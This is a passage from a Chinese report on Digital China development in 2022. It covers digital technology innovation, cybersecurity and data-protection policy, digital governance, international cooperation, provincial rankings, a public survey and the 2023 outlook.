位进一步强化,创新联合体等新型组织模式释放创新动能。 ( 一 )关键数字技术研发应用取得积极进展 我国 5G 实现技术、产业、 网络、应用的全面领先,6G 加快研发布局。我国在集成电路、人工智能、高性能计算、电 子设计自动化(EDA)、数据库、操作系统等方面取得重要进 展。人工智能芯片和开发框架加速发展,基本形成 AI 基础软 硬件支撑能力。国产操作系统加速规模化推广应用,鸿蒙总装 机突破 3.2 亿。 ( 二)前沿数字技术创新日益活跃 “科技创新 2030 —重大项目” 、国家重点研发计划、国家 自然科学基金进一步加大对高端芯片和集成电路、操作系统和 关键软件、人工智能、量子信息、类脑智能等领域的基础研究 和战略前瞻布局。数字技术研究探索能力持续提高。2022 年, 我国信息领域相关 PCT 国际专利申请近 3.2 万件,全球占比 达 37%,数字经济核心产业发明专利授权量达 33.5 万件, 同 比增长 17.5%。信息技术管理、计算机技术等领域有效发明专 利增长最快,分别同比增长 59.6%和 28.8% 。信息领域研究前 沿核心论文份额和施引论文被引频次份额位居世界第二,计算 机科学论文被引次数持续位列世界第一。 图 16 2018 年-2022 年我国信息领域相关 PCT 申请专利增长情况 数据来源:根据世界知识产权组织数据统计 注:本图中信息领域相关 PCT 专利申请量,指音视频技术、电信技术、数字通信、 基本通信过程、计算机技术、信息技术管理方法、半导体技术等领域的 PCT 专利 申请数量之和。 (三)数字技术协同创新生态不断优化 数字技术企业创新主体地位持续强化,数字领域产学研用 生态蓬勃发展。2022 年,各地加快推进数字技术创新联合体 建设,湖北成立新一代网络和数字化产业技术创新联合体,南 京成立未来网络创新联合体,推动提升数字技术创新成果转移 转化成效。数字企业开放创新平台加快建设,有力推动联合攻 关。 中关村企业融通创新联合体、3C 智能制造创新联合体等 一大批创新联合体启动运行。数字开源社区协同开放创新生态 日益健全完善,操作系统、云计算、软件开发等各类开源社区 已超 500 个,涌现出大批具有核心技术的开源平台与项目。 (四)数字人才培育支持力度加快提升 数字领域高水平人才创新研究支持力度加快提升。2022 年,国家自然科学基金委数字与数字交叉领域资助国家杰出青 年科学基金项目 64 项、优秀青年科学基金项目 98 项、青年科 学基金项目 2634 项、地区科学基金项目 262 项。数字人才培 育体系更加健全,国务院学位委员会、教育部发布《研究生教 育学科专业目录(2022 年)》《研究生教育学科专业目录管 理办法》,进一步引导高校加强数字领域学科建设和专业设置。 数字人才供给能力持续提升。2022 年通讯和互联网领域相关 专业毕业生人数达 159 万, 占毕业生总数的 15%,在全部 19 个分行业中位列第一。 九、数字安全保障体系不断完善 数字安全是数字中国建设的基本保障。2022 年,我国网 络安全政策法规持续健全,标准规范建设体系化推进,保障能 力显著增强,数据安全管理和个人信息保护成效显现,安全产 业发展迈向新阶段。 ( 一)网络安全法律法规和标准体系逐步健全 2022 年,《网络安全审查办法》修订出台,对网络平台 运营者开展数据处理活动提出要求,提升关键信息基础设施供 应链安全保障水平。《网络安全法》《网络安全等级保护条例》 等加快修订制定。出台《网络产品安全漏洞收集平台备案管理 办法》,为网络产品安全漏洞管理工作的开展提供依据。修订 《通信网络安全防护管理办法》,强化数字基础设施安全保障 能力。发布《关键信息基础设施安全保护要求》等 30 项网络 安全国家标准,研制《软件供应链安全要求》《软件产品开源 代码安全评价方法》《网络安全产品互联互通框架》等网络安 全领域亟需标准。工业互联网、车联网、物联网等融合领域网 络安全标准研制加快推进,推进数字安全标准从“ 单一到多元” 的系统突破。 ( 二)网络安全保障能力显著增强 网络安全防护能力大幅提升,工业互联网、车联网等新型 融合领域网络安全保障能力明显增强。 圆满完成北京冬奥会、 党的二十大等重大活动网络安全保障。网络安全产业规模不断 扩大,2022 年我国网络安全产业规模预计近 2170 亿元,同比 增长 13.9%,从业企业数量超过 3000 家。 网络安全人才队伍 不断壮大,全国超 500 所本科和高职院校开设网络与信息安全 相关专业。连续 9 年举办国家网络安全宣传周,深入开展常态 化的网络安全宣传教育。2022 年国家网络安全宣传周期间, 话题阅读量累计 38.6 亿次,主要短视频平台视频播放量超 5 亿次。 图 17 2017 年-2022 年我国网络安全产业规模增长情况 数据来源: 中国信息通信研究院 (三)数据安全管理和个人信息保护有力推进 数据安全管理制度体系加快构筑,数据出境安全评估、数 据安全管理认证等《数据安全法》配套制度加快建立。《个人 信息出境标准合同规定(征求意见稿)》公开征求意见,推进 规范个人信息出境活动,保护个人信息权益。《数据出境安全 评估办法》明确应当申报数据出境安全评估的情形,提出数据 出境安全评估具体要求。《数据安全管理认证实施规则》推动 规范网络数据处理活动,加强网络数据安全保护。持续组织开 展 App 违法违规收集使用个人信息专项治理。市场监管总局、 国家网信办联合发布《关于实施个人信息保护认证的公告》, 鼓励个人信息处理者通过认证方式提升个人信息保护能力。 【第四篇】数字中国发展环境不断优化 十、数字治理营造良好发展环境 数字治理是数字中国健康可持续发展的基本支撑。2022 年,我国坚持促进发展和监管规范并重,加快制定修订数字领 域法律法规体系,健全数字标准体系,积极推进数字市场秩序 规范,深入开展网络空间生态治理,持续提升数字治理能力。 ( 一)数字治理法律法规体系不断完善 《反电信网络诈骗法》审议通过,对预防、遏制和惩治电 信网络诈骗活动,加强反电信网络诈骗工作作出全面制度安 排。国家网信办制定修订《互联网用户账号信息管理规定》《互 联网信息服务深度合成管理规定》《互联网弹窗信息推送服务 管理规定》《移动互联网应用程序信息服务管理规定》《互联 网跟帖评论服务管理规定》,持续完善互联网信息服务管理制 度,依法规范新技术新应用新业态发展。最高人民法院、最高 人民检察院、公安部制定《关于办理信息网络犯罪案件适用刑 事诉讼程序若干问题的意见》,最高人民法院制定《关于审理 网络消费纠纷案件适用法律若干问题的规定( 一)》 《关于加 强区块链司法应用的意见》《关于规范和加强人工智能司法应 用的意见》等,进一步明确信息网络犯罪案件、网络消费纠纷 案件法律适用,完善区块链、人工智能司法应用规定。 ( 二)数字领域标准建设稳步推进 数字领域行业标准建设稳步推进。2022 年,全国信息技 术标准化技术委员会发布国家标准 74 项,在研标准 207 项, 涉及基础软硬件、大数据、云计算、人工智能、物联网、智能 制造、智慧城市等方面。全国信息化和工业化融合管理标准化 技术委员会在两化融合管理体系、数字化供应链、工业互联网 平台、制造业数字化仿真、工业软件等领域开展 200 余项标准 研究,其中 2 项国际标准、16 项国家标准以及 2 项行业标准 发布实施,在全国 30 余万家企业广泛应用。全国区块链和分 布式记账技术标准化技术委员会组织制修订 7 项国家标准,推 动区块链标准体系建设。全国数字计量技术委员会和全国人工 智能计量技术委员会成立,推进构建数字计量、人工智能领域 计量技术规范体系。我国积极推进中外标准互认、中国标准与 国际标准体系兼容,深度参与国际电信联盟(ITU)、国际标 准化组织(ISO)、国际电工委员会(IEC)等国际标准组织 标准研制,积极参与第三代合作伙伴计划(3GPP)等全球知 名标准化组织活动,在自动驾驶、大数据、工业互联网、智慧 城市和 5G 卫星通信等方面,牵头推动多个数字领域国际标准 通过立项审议或正式发布。 (三)数字治理水平持续提升 数字市场竞争制度建设取得重要进展。2022 年 6 月,全 国人大常委会通过《反垄断法》修订,进一步明确反垄断相关 制度在互联网平台领域的具体适用规则,明确经营者不得利用 数据和算法、技术、资本优势以及平台规则等从事法律禁止的 垄断行为,排除、 限制竞争。 11 月,《反不正当竞争法(修 订草案征求意见稿)》公开征求意见,细化了互联网专条和传 统不正当竞争行为的网络化表现及损害竞争情形,系统回应数 字平台新型不正当竞争行为的挑战。平台治理进入常态化监管 阶段。2022 年 7 月,市场监管总局对 28 起未依法申报违法实 施经营者集中案件作出行政处罚决定,涉及多个互联网平台企 业。 12 月,市场监管总局对知网涉嫌实施垄断行为作出行政 处罚决定。 (四) 网络空间综合治理效能提升 2022 年, 网络生态治理工作扎实推进。 “ 清朗” 系列专项 行动深入开展,集中打击网络谣言和虚假信息、整治 MCN 机 构信息内容乱象、整治网络直播和短视频领域乱象、整治未成 年人网络环境、治理算法滥用、整治移动互联网应用程序领域 乱象、规范传播秩序,有效清理违法和不良信息 5430 余万条, 处置账号 680 余万个,下架 APP 、小程序 2890 余款,关闭网 站 7300 多家,有力维护网民合法权益。加强网络内容从业人 员管理,从行为规范、教育培训、监督管理等方面作出明确要 求。开展打击网络侵权盗版“ 剑网 2022” 专项行动,严厉打击 文献数据库、短视频和网络文学等重点领域侵权盗版行为。网 络执法力度持续加大。2022 年,全国网信系统累计依法约谈 网站平台 8608 家,警告 6767 家,罚款处罚 512 家,暂停功能 或更新 621 家,下架移动应用程序 420 款,会同电信主管部门 取消违法网站许可或备案、关闭违法网站 25233 家,移送相关 案件线索 11229 件。国家网信办印发《关于切实加强网络暴力 治理的通知》,拦截清理涉网络暴力信息 2875 万条,提示网 民文明发帖 165 万次,向 2.8 万名用户发送一键防护提醒,从 严惩处施暴者账号2.2 万个,有效防范热点事件网络暴力风险, 进一步压实网站平台主体责任。 十一、数字领域国际合作凝聚广泛共识 数字领域国际合作是推动高水平对外开放的重要纽带。 2022 年,我国积极参与国际组织和多边机制下数字议题磋商 研讨,围绕数字领域重要议题积极贡献中国方案,深入拓展“ 丝 路电商”,大力发展数字贸易,持续深化数字领域国际交流与 合作。 ( 一)中国主张国际影响力显著提升 2022 年, 习近平主席在多个场合深入阐述数字领域国际 合作的中国主张、中国方案,在二十国集团领导人第十七次峰 会上呼吁合力营造开放、包容、公平、公正、非歧视的数字经 济发展环境;在亚太经合组织第二十九次领导人非正式会议上 提议加速数字化绿色化协同发展;在金砖国家领导人第十四次 会晤上提出着眼数字时代人才需要,为加强创新创业合作打造 人才库;在全球发展高层对话会上提出我国将在包括数字经济 在内的 8 个重点领域与国际合作伙伴特别是发展中国家开展 务实合作。《携手构建网络空间命运共同体》白皮书发布,介 绍新时代我国互联网发展和治理理念与实践,分享我国推动构 建网络空间命运共同体的积极成果。2022 年世界互联网大会 国际组织正式成立,为全球互联网共商共建共享提供平台,会 员已覆盖 6 大洲 20 余个国家,包括 100 余家机构、组织、企 业及个人。世界互联网大会乌镇峰会成功举办,围绕“共建网 络世界 共创数字未来—携手构建网络空间命运共同体” 主题, 开展对话与交流,引发全球各方高度关注和热烈反响。 ( 二 )多双边和区域数字合作积极推进 积极推动数字领域多边交流与合作。2022 年,我国积极 参与联合国、世界贸易组织(WTO)、二十国集团(G20)、 亚太经合组织(APEC)、金砖国家(BRICS)、上海合作组 织(SCO)等机制下数字领域议题磋商研讨,提出《二十国集 团数字创新合作行动计划》,推动达成《“ 中国+ 中亚五国” 数 据安全合作倡议》,推动 WTO 第十二届部长级会议继续就电 子传输临时免征关税达成共识。围绕数字领域热门话题,举办 APEC 数字能力建设研讨会、中国—上海合作组织数字贸易圆 桌研讨会、“ 携手构建网络空间命运共同体”精品案例展示、世 界互联网领先科技成果发布和“ 直通乌镇”全球互联网大赛等 重要活动,推动数字领域国际交流合作。深入推进金砖国家数 字领域务实合作。举行金砖国家数字经济对话会、金砖国家工 业互联网与数字制造发展论坛等重要活动,推动达成《金砖国 家数字经济伙伴关系框架》和《金砖国家网络安全务实合作路 线图》进展报告,发布《金砖国家制造业数字化转型合作倡议》。 数字经济领域对外投资合作不断深化,截至 2022 年底, 已与 13 个国家签署数字经济领域投资合作备忘录。 “ 丝路电商” 伙 伴关系不断拓展,已与 28 个国家建立双边电子商务合作机制。 (三)数字化成为国际贸易增长的新动力 数字技术持续赋能我国对外贸易创新发展。2022 年,我 国跨境电商进出口规模达 2. 11 万亿元,同比增长 9.8%,高于 同期外贸增速 2. 1 个百分点,规模五年增长近 10 倍。全国设 立 165 个跨境电商综合试验区,覆盖 31 个省(自治区、直辖 市)。 区内服务生态持续完善,截至 2022 年底, 区内跨境电 商产业园区数量超 690 个,举办创业大赛等“双创” 活动超 3500 场,培训超 5000 场,培训人次超 17 万。业务模式加快创新, 各大跨境电商平台大力发展直播电商、社交电商等业务,加快 出海步伐。独立站数量超 20 万, 已成为我国企业与产品出海 重要渠道。海外仓实现从无到有、从小到大发展,服务范围辐 射全球,截至 2022 年底,我国企业建设运营海外仓数量超 2400 个,面积超 2500 万平方米。数字贸易开放合作持续深化,2022 年,可数字化交付的服务贸易规模达到 2.3 万亿元,比五年前 增长了 62.6%。积极参与 OECD 、WTO 、IMF 、UNCTAD 联 合开展的《数字贸易测度手册》修订工作,提交关于数字交付 贸易测度的中国案例。 【第五篇】数字中国发展成效评价 十二、2022 年数字中国发展地区评价 国家网信办组织开展 2022 年数字中国发展评价工作,围 绕数字中国建设“2522”整体框架,结合相关部门和机构数据, 以及数字中国发展情况网络问卷调查结果,重点评估 31 个省 (自治区、直辖市)在夯实基础、赋能全局、强化能力、优化 环境以及组织保障等方面的进展成效。评价指标如表 1 所示。 表 1 数字中国发展评价指标体系 一级指标 二级指标 重点评估要素 数字基础 底座 数字基础设施 5G 用户普及水平、千兆宽带接入用户情况、互联网省际 出口带宽、重点网站 IPv6 支持水平、算力规模、工业互 联网发展情况等 数据资源 政务数据共享与数据开放水平、数据产量情况等 数字全面 赋能 数字经济 ICT 相关产业营业收入情况、IT 项目投资情况、农业生产 信息化水平、制造业数字化转型情况、网上零售交易情况 等 数字政务 在线政务服务实名用户情况※ 、省级行政许可事项网上办 理水平※、网上政务服务能力※、党政机关数字化建设感知 情况* 、政务网站和新媒体建设情况等 数字文化 文化场馆数字化服务情况※、经营性互联网文化单位数量、 公共数字文化服务感知情况* 、网民数字化阅读情况*等 数字社会 数字化在教育、医疗* 、社保、交通* 、法律、生活缴费*、 城市管理等重点领域的应用成效 数字生态文明 智慧国土空间规划水平、排污单位自行监测数据公开情况 等 数字关键 能力 数字技术创新 ICT 相关产业 R&D 人员及经费投入情况*、ICT 相关高新 技术企业情况、ICT 领域学术成果影响力等 数字安全保障 网络安全保障能力建设情况、网络安全制度体系建设和责 任制落实情况等 数字化发 展环境 数字治理生态 法律法规建设情况、网络内容管理从业人员管理情况等 数字领域国际合作 数字贸易情况等 组织实施 保障 组织领导 统筹协调工作情况等 资金、政策支持 资金项目投入、政策支持情况*等 示范引领 重点领域先行先试情况等 注:*表示该项指标数据使用了数字中国发展情况网络问卷调查统计结果。 ※表示该项指标 2022 年数据暂未发布,评价使用 2021 年数据结果。 2022 年,我国 31 个省(自治区、直辖市)深入贯彻党中 央、国务院关于加快数字中国建设的战略部署,加快构建数字 中国建设一体化推进格局,结合地区基础条件和优势特色,统 筹发展和安全,加快夯实数字化发展基础底座,推动数字技术 全面融入经济、政治、文化、社会和生态文明建设,优化数字 化发展环境,形成了各具特色的发展模式,积累了一批优秀实 践成果经验。 综合评价结果显示,浙江、北京、广东、江苏、上海、福 建、 山东、天津、重庆、湖北等地区数字化综合发展水平位 居全国前 10 名。这些地区将数字化发展摆在地区发展的重要 位置,坚持改革创新和系统推进,建立强有力的组织推进机制, 前瞻谋划布局数字化发展的整体战略,加强整体设计,积极推 动跨部门跨行业协同联动,全面提升地区数字化发展的整体 性、系统性、协同性,争创数字中国建设先行区。 浙江省全力打造数字变革高地,高质量打造一体化智能化 公共数据平台,以党政机关整体智治推动省域全方位变革、系 统性重塑,积极探索开展平台经济监管“ 浙江模式”,打造全球 数字贸易中心,搭建高级别全球数字交流合作平台,以数字化 改革驱动共同富裕先行和省域现代化先行。北京市大力推动全 球数字经济标杆城市建设,加快推进数据专区建设和开发利 用,推动政务服务数字化水平明显提升,布局战略新兴产业集 群, 以国际科技创新中心建设为抓手加快关键核心技术突破, 打造自主可控软硬件技术体系,持续有力有效捍卫首都数字安 全防线。广东省加快数字化发展,巩固提升数字经济核心产业 优势,建强鹏城国家实验室等技术创新平台,持续提升全省一 体化政务服务能力,推进数字政府改革向基层延伸,开展数据 要素市场化配置改革、“ 数据海关” 等试点建设,加快推进粤港 澳跨海智慧通道等重大工程建设。江苏省高质量推进数字江苏 建设,深入推进“双千兆” 网络建设,加快布局工业互联网、智 能交通、城市能源互联网、智慧教育等应用基础设施,加快智 能机器人、工控系统等领域技术产业化,建设工业大数据应用 示范区。上海市全面推进城市数字化转型,率先试点金融、交 通等公共数据授权运营,积极布局数字经济新赛道,推动公共 服务更加普惠包容,创新打造数字文化平台,大力推动数字贸 易蓬勃发展,加快建设具有世界影响力的国际数字之都。福建 省将数字福建建设作为基础性先导性工程,强化政务公共平台 一体化建设,发展贴近社会、民生、企业需求的数字化应用体 系,高标准举办数字中国建设峰会,加快构建跨境电商综合示 范区集群,成为深化数字领域国际交流合作的重要对外窗口。 山东省大力实施数字强省战略,高标准建设国家级骨干直联点 “ 双枢纽” 省份,构建一体化大数据平台体系,全面推行“ 免证 办事”“ 一码通行”,加快建设“ 爱山东” 政务服务、“ 文物山东” 文化服务等平台,建成全面覆盖山水林田湖草沙的地形级实景 三维一张图。天津市统筹发展和安全,加快用“创新力”增强“ 防 护力”,在集成电路、 自主软件、人工智能等关键数字技术持 续攻坚,围绕全产业链布局信息技术创新产业生态体系,建立 市区一体的数据安全和个人信息保护工作协调机制,为群众安 居乐业和企业安全有序运行提供坚强保障。重庆市坚持以数字 化改革引领系统性变革,加快推进数字经济、人工智能国家级 试验区“双区”建设,依托汽车制造、医疗产业等工业基础,建 立起“ 软硬结合” 的高质量数字经济发展路径,搭建互联云川、 通达国际的专用网络通道,加快建设西部国际数据门户。湖北 省以数字湖北为抓手,推动 5G 、工业互联网等数字技术融合 发展,引导钢铁、石化等传统产业智能化改造,发挥全国重要 数字技术智力密集区作用,高标准建设光谷科创大走廊,加速 光电子信息、空天科技、集成电路等关键核心技术突破,积极 在光电子信息领域打造具有国际竞争力的标志性产业链和数 字产业集群。其他地区积极顺应数字时代发展趋势,结合发展 实际和特色优势,加快运用数字思维、数字认知、数字技能, 推进经济社会发展和治理能力的质量变革、效率变革和动力变 革,数字基础设施建设水平明显提升,数据资源加快汇聚利用, 数字产业培育壮大,数字化转型迈入快车道,数字社会治理和 服务水平稳步提升,地区资源禀赋进一步转化为数字化发展动 能,数字化发展取得了积极成效,成为驱动引领区域高质量发 展的重要抓手和关键路径。 同时,我们也要看到,各地区在推进数字中国建设中还有 一些重点问题值得关注。部分地区还尚未形成数字化与经济社 会协同互动、良性互促的发展格局,区域间数字化发展水平差 距有进一步拉大的风险;在推进数字化发展过程中还存在不同 程度的形式主义,重建设、轻应用,重数量、轻质量等现象时 有发生,不同部门、不同行业数字系统建设自成体系,难以有 效共享和互联互通,增加财政负担,造成资源浪费;部分地区 发展思路不清晰,照搬先进地区数字化建设经验和发展模式, 数字化建设热度高、赋能成效少,难以发挥自身比较优势。需 要加快形成数字中国建设横向打通、纵向贯通、协调有力的一 体化推进格局。 十三、2022 年数字中国发展网民感知情况分析 为了解各地区群众在数字中国建设中的感受情况和意见 建议,2022 年国家网信办持续开展数字中国发展情况网络问 卷调查。调查范围覆盖我国 31 个省(自治区、直辖市)的 18 至 70 岁网民,回收有效样本超过 18 万份。问卷从数字化学习 工作、数字化转型、数字公共服务、数字化公共治理、数字素 养与技能等方面对公众的感知情况进行统计分析。参与调查的 网民普遍认为,2022 年在数字中国发展中的获得感、幸福感 和安全感持续提升,数字化学习工作广泛普及,数字公共服务 更加普惠便捷,数字治理成效更加明显,期盼未来能享受更便 捷、更高效、更普惠的数字服务。 数字化学习工作广泛普及。过去一年中,受新冠肺炎疫情 影响,数字技术在学习、工作中的应用广度和深度加速提升。 在线上学习方面,超过半数受访者认为“ 上网课” 有效支撑了疫 情期间的课程学习。其中,55.8%的受访者表示网课画面清晰、 稳定流畅,50%以上受访者对课堂互动和老师沟通反馈满意。 在线上办公方面,线上会议成为工作会议的重要形式,约 45% 的受访者参加线上会议次数占总参会次数的比例超 20%。 数字化转型加快推进。在企业数字化转型方面,分别有 57.0%、43.2% 、34.7%的受访者认为企业较多运用了数字化办 公技术、数字化管理技术和网络化协同技术,较 2021 年调查 结果分别提高 9 个、10.7 个和 10.5 个百分点。在农业数字化 转型方面,超过 50%的受访者认为,相较于 2021 年,身边有 更多人在农业销售、种植等领域运用数字技术。在政府支持方 面,46.9%的受访者表示了解“本地政府对数字产业的投资发展 提供融资贷款、税费减免等支持” ,30%以上受访者了解“本地 政府为数字技能培训项目、企业数字化转型提供补贴”。 数字公共服务更加普惠便捷。在数字医疗服务方面,80% 左右的受访者了解本地提供线上缴费、自助机缴费、线上查询 检验报告、线上预约挂号等数字医疗服务,67.7%的受访者表 示在本地使用过线上医疗缴费服务。在数字交通服务方面,受 访者中对公共交通扫码支付、交通信息实时推送服务表示非常 满意的占比相较 2021 年分别提高 9.8 和 7 个百分点。在数字 文化服务方面,在关注数字文化服务的受访者中,近 90%的 受访者表示本地能够提供线上文化活动,超过 80%表示本地 能够提供数字图书馆、数字博物馆服务。在数字适老化服务方 面,近 65%的受访者知晓本地采取多种举措促进老年人融入 数字生活,在上述受访者中,80.6%表示本地社区开展过针对 老年人的防诈骗宣讲、 网络安全讲座等活动,近 60%表示在 政务大厅等场所有专人帮助老年人线上/自助业务操作。 数字化公共治理取得明显成效。在数字化能力建设方面, 78.3%的党政机关/事业单位受访者表示所在部门内部服务事 项能线上办理,78.2%的受访者表示所在部门非涉密业务支持 移动办公软件处理,近 60%的受访者表示所在部门已将数字 素养和技能水平作为干部选拔的考量因素。在政务新媒体影响 力方面,在关注政务新媒体账号的受访者中,75%以上受访者 对政务新媒体更新频率和发布内容质量表示满意,65%以上的 受访者认为政务新媒体账号与粉丝互动活跃。在基层数字化治 理方面,超 70%的受访者了解居住地社区(村委会)数字化 基层治理举措,超 50%的受访者对居住地社区(村委会)线 上服务表示满意,超 75%的受访者对数字化治安防控表示满 意。 数字素养与技能有待提升。在数字领域基本概念方面, 调查围绕大数据特点、数据类型、芯片、计算机进制、物联网、 云计算等设置若干认知判断题。调查显示,对于大数据特点、 计算机芯片和计算机进制的作答准确率分别达 66.1% 、56.0% 和 53.0%,但数据类型、云计算的作答准确率低于 30% 。在数 字常用技能方面,调查了解了公众关于数字设备操作、数字工 具编辑、数字程序开发等技能的自评估情况。调查显示,56.2% 的受访者认为具备数字设备基础操作技能(智能手机使用、网 络搜索及软件下载、网络语音或视频聊天工具使用等),33.8% 的受访者认为具备基础编辑技能(编辑文档与音视频、使用电 子邮件等),15.1%的受访者认为具备数字程序基础开发能力。 数字中国发展网民建议。通过对调查收到的 10 万余条有 效建议的大数据词频分析,“便捷”“ 生活”“数据” 等成为公众建 议最热关键词。受访者普遍反映,希望进一步加强互联网基础 设施建设,完善政府数据联通并简化网上办理流程,加强各级 政府信息公开和政策发布的权威性、一致性和便民性,增加对 数字素养和技能的培训指导,在数字化建设中更加重视老年群 体和农村偏远地区等。 图 18 数字中国发展建议关键词 【第六篇】数字中国发展形势与展望 十四、2023 年数字中国发展形势与展望 ( 一)深刻把握以数字中国建设推进中国式现代化的使 命与任务 党的二十大报告指出,要加快建设网络强国、数字中国。 建设数字中国是从基本国情出发实现现代化的必然选择,我国 网民规模超过 10 亿,实现现代化的过程也是全体人民共享更 高质量数字化发展成果的过程。建设数字中国是扎实推动共同 富裕的必然要求,通过加强数字技术在社会生活各领域各场景 的运用,创造更多岗位,提供更多产品与服务,不断满足人民 对美好生活的向往。建设数字中国是实现物质文明和精神文明 相协调的重要助力,在发展数字经济不断提高人民物质生活条 件的同时,通过数字化手段提高思想道德素质和科学文化素 质,实现物质和精神文明全面发展。建设数字中国是促进人与 自然和谐共生的重要途径,通过数字中国与美丽中国建设的互 动互促,推进绿色低碳发展,加快生态保护修复和环境治理数 字化转型,提升生态文明建设质量和水平。建设数字中国是走 和平发展道路的重要一环,以数字化促进提升发展水平是各国 人民的共同追求,数字中国建设为其他国家和地区推进数字化 转型提供重要经验和借鉴,为全球经济稳定和合作发展创造机 遇和条件。 党的十八大以来,以习近平同志为核心的党中央深刻洞察 新一轮科技革命和产业变革趋势,牢牢把握全球数字化发展与 数字化转型的重大历史机遇,坚持以数字中国建设作为国家数 字化发展总体战略,作出系列重要论述、重大部署,深刻论述 了数字中国建设的重大理论和实践问题,深刻阐明了在社会主 义现代化建设全局中的重要地位和作用,引导数字中国建设不 断取得新成就、迈上新台阶,形成了具有中国特色的数字化发 展道路。数字中国建设丰富了中国式现代化的时代背景、实践 路径和建设目标,将为数字时代推进中国式现代化提供强劲动 力,为构筑国家竞争力新优势提供有力支撑。 ( 二)数字中国发展面临的形势挑战 当前,以信息技术为代表的新一轮科技革命和产业变革突 飞猛进,为转变发展方式、增进人民福祉、丰富精神文化生活、 促进绿色化转型、推动交流合作提供了重要契机,为加快建设 数字中国,推进中国式现代化提供了强大发展动能。与此同时, 世界之变、时代之变、历史之变正以前所未有的方式展开,单 边主义、保护主义、霸权主义对世界和平与发展的威胁居高不 下,数字中国建设面临着愈发纷繁复杂的发展形势。 从外部看,一是关键核心技术之争加剧数字产业链动荡 局势。围绕关键核心技术和产业实力的国际竞争日趋激烈,各 主要经济体纷纷聚焦数字领域加强战略部署,提升本国创新能 力,强化关键产业发展的主导权,全球数字产业的产业链供应 链的发展与稳定面临多重风险。二是数字领域国际标准体系和 治理规则面临深刻变革。传统与非传统安全问题交织频发,数 据跨境流动、数字主权、数字安全与数字税等领域的理念、制 度、规则之争愈加激烈,数字领域国际合作格局面临更大幅度 调整。三是新技术、新应用持续涌现带来新挑战。以 Web3.0、 量子计算、卫星通信、生成式人工智能(AIGC)等为代表的 新技术加快实现从研究探索到商业落地的跨越,在驱动生产生 活方式变革的同时,也进一步放大和凸显了隐私泄露、技术滥 用、价值渗透等科技伦理问题,为社会组织架构、劳动力市场、 治理监管等带来了严峻挑战。 从内部看,一是数字技术创新潜能有待深入挖掘。 关键 领域核心技术“ 受制于人” 的局面尚未根本改变。数字创新体系 整体效能不强,创新资源存在分散、重复、低效等问题,制约 创新成果转化。数字人才基础薄弱、缺口巨大,重引进轻培育 较为明显。 二是数字化发展的系统性、整体性、协同性亟需 提升。数字中国建设横向打通、纵向贯通、协调有力的一体化 推进格局尚未形成。数字基础设施互联互通、共享利用还面临 众多堵点难点,数据要素潜能有待充分释放,数据基础制度和 标准体系尚不完善,数据质量参差不齐,可利用性不足。数字 技术与经济、政治、文化、社会、生态文明建设的全方位、系 统化融合有待深化,数字技术、数字安全等关键能力还不能充 分满足新形势新要求,统筹利用国内国际两个市场、两种资源 的数字化发展环境有待健全完善。三是数字治理体系有待深度 优化。网络空间经济和社会组织方式发生深刻变革,随着网络 空间活动的进一步深入,其影响将愈发凸显。数字技术在社会 治理中的应用深度、广度有待深化,公共政策感知的动态化、 管理的智能化、施策的精准化水平有待提升。数字治理方式手 段相对滞后,“ 事后管理”“ 多头管理” 还未向“ 过程治理”“协同 治理” 转变。四是数字包容体系尚需健全完善。数字鸿沟从“接 入鸿沟” 转向“ 能力鸿沟”,城乡间、地区间、领域间、人群间 的数字化发展应用差距依然较为明显。特别是近期生成式人工 智能成为全球热点,可能显著改变工作、生活、学习、创新方 式,对人的数字素养与技能提出更高要求,数字技能培育体系 建设与数字应用适老化、适残化、适农化、简约化改造需有序 有力、双管齐下。 (三)2023 年数字中国发展展望 2023 年是全面贯彻落实党的二十大精神的开局之年,也 是全面推进《数字中国建设整体布局规划》实施的起步之年。 数字中国建设必须坚持以习近平新时代中国特色社会主义思 想特别是习近平总书记关于网络强国的重要思想为指导,加强 组织领导、健全体制机制、保障资金投入、强化人才支撑、营 造良好氛围,全面提升整体性、系统性、协同性,以数字化驱 动生产生活和治理方式变革,推动高质量发展迈上新台阶,为 全面建设社会主义现代化国家提供有力支撑。 一是夯实数字中国建设基础。打通数字基础设施大动脉。 按照适度超前原则,深入推进 5G 网络、千兆光网规模化部署 和应用,着力提升 IPv6 性能和服务能力,推动移动物联网全 面发展,大力推进北斗规模应用。统筹布局绿色智能的算力基 础设施,推动东西部算力高效互补和协同联动。深化重点领域 基础设施数字化改造,深入打通经济社会发展的信息“ 大动 脉”。 畅通数据资源大循环。加快健全数据管理体制机制,构 建数据基础制度体系,推动数据资源跨地区跨部门跨层级整合 归集、共享利用。建设完善国家基础数据库,建设公共卫生、 科技、教育等领域国家数据资源库,健全国家公共数据开放平 台,促进公共数据高效共享和有序开发利用。完善数据产权制 度,开展数据资产计价研究,建立数据要素按价值贡献参与分 配机制。 二是全面赋能经济社会发展。做强做优做大数字经济。 培育壮大工业互联网、区块链、人工智能等数字产业,打造具 有国际竞争力的数字产业集群。加快传统产业数字化转型,积 极发展智慧农业,深入实施智能制造工程,大力推进工业数字 化转型,持续深化金融、贸易、教育、医疗、交通、能源等领 域数字技术创新应用。支持数字企业发展壮大,推动平台企业 规范健康发展。大力发展数字贸易,加快推动出台促进数字贸 易发展的顶层设计,稳步推进数字贸易示范区建设,加强数字 领域规则对接,推进高水平对外开放。发展高效协同的数字政 务。加快制度规则创新,完善与数字政务建设相适应的规章制 度。统筹推进党政机关数字化建设,促进信息系统互联互通、 数据按需共享、业务高效协同。健全大数据辅助决策机制,提 升政府科学决策水平。持续优化全国一体化政务服务平台功 能,深入推进“ 一网通办”,着力构建全时在线、渠道多元、全 国通办的一体化政务服务体系,针对老年人、残疾人等特殊群 体需求深入推进信息无障碍建设,全面提升政务服务能力。打 造自信繁荣的数字文化。引导各类平台和广大网民加强优质网 络文化产品创作,强化网络版权保护。加快建设国家文化大数 据体系,积极构建中华文化数据库。稳步推进智慧图书馆、智 慧博物馆、智慧美术馆、公共文化云建设。创新发展线上演播、 沉浸式体验、数字演艺、数字艺术等新兴业态。发挥国家对外 文化贸易基地作用,推动数字文化产品、服务、技术、 品牌、 标准“ 走出去”。构建普惠便捷的数字社会。促进数字公共服务 普惠化,纵深推进国家教育数字化战略行动,完善国家智慧教 育平台,积极发展数字健康,规范互联网诊疗和互联网医院发 展。推进数字社会治理精准化,深入实施数字乡村发展行动。 普及数字生活智能化,加快建设数字家庭,构建智慧便民生活 圈,打造新型数字消费业态。扎实推进全民数字素养与技能提 升行动,构建能力发展培养体系,提高全民数字化适应力、胜 任力、创造力,促进全民畅享美好数字生活。建设绿色智慧的 数字生态文明。打造“ 实时、动态、立体、鲜活” 的生态环境综 